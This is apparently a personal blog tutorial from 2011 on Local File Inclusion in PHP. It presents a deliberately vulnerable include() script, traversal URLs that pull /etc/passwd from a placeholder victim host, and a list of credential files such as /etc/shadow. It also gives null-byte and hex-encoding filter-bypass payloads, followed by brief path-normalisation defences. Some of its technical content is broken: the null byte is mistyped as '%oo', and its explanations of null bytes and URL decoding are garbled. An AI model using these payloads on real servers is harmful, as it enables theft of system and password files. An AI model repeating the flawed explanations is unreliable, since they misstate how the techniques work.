Wednesday, November 30, 2011

LOCAL FILE INCLUSION

  • What is Local File Inclusion?
Local File Inclusion (LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected.



A typical example of a PHP script vulnerable to LFI is as follows:

 

<?php
$page = $_GET['page'];
if(isset($page))
include("files/$page");
else
include("index.php");
?>
A legitimate request made to the script could look like this:


 
 http://victim.com/index.php?page=example.php

This is of little use to a potential attacker, who is more likely to be interested in the files outside the files/ directory. To do this, an attacker could use LFI. The simplest example would be:


 
 http://victim.com/index.php?page=../../../../etc/passwd
The repeated ../ characters has caused include() to traverse to the root directory, and then include the Unix password file /etc/passwd. Unix /etc/passwd is a common file used to demonstrate directory traversal, as it is often used by crackers to try cracking the passwords.

You may also wish to peruse around in other directories, such as:

 
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

  • Poison Null Byte Attacks:
Every now and again, though, the website may output that /etc/passwd/ cannot be found simply because the server is interpreting the location as if it is /etc/passwd.php/. To correct this, we need to apply what is called a Null Byte. This bit of code looks like: %oo (percent double zero). In SQL, it means 0, but everywhere else in coding, it is interpreted similar to a black hole, such as /dev/null/. This code eliminates the use of an extension. The code would appear as /etc/passwd when entered into the address bar.


 
http://victim.com/index.php?page=../../../../etc/passwd%oo

  • Filter Evasion:
Most good admins will have protected against the simplest LFI attacks, so we should update the example script accordingly.

 
<?php
$page = str_replace('../', '', $_GET['page']);
if(isset($page))
include("files/$page");
else
include("index.php");
?>

One way to break this defence is to encode one or more characters into hexadecimal. This works because the browser decodes the input, but PHP does not. Our new LFI would be:


http://victim.com/index.php?page=..%2F..%2F..%2F..%2Fetc%2Fpasswd

  • Protection:
  1. Process URI requests that do not result in a file request, e.g., executing a hook into user code, before continuing below.
  2. When a URI request for a file/directory is to be made, build a full path to the file/directory if it exists, and normalize all characters (e.g., %20 converted to spaces).
  3. It is assumed that a 'Document Root' fully qualified, normalized, path is known, and this string has a length N. Assume that no files outside this directory can be served.
  4. Ensure that the first N characters of the fully qualified path to the requested file is exactly the same as the 'Document Root'. If so, allow the file to be returned. If not, return an error, since the request is clearly out of bounds from what the web-server should be allowed to serve.


Happy Hacking...Enjoy...

For educational purpose only...Do not misuse it...
Posted by Rajat Das at 6:10 PM

No comments:

Post a Comment

If you like this post, comment please...

Subscribe to: Post Comments (Atom)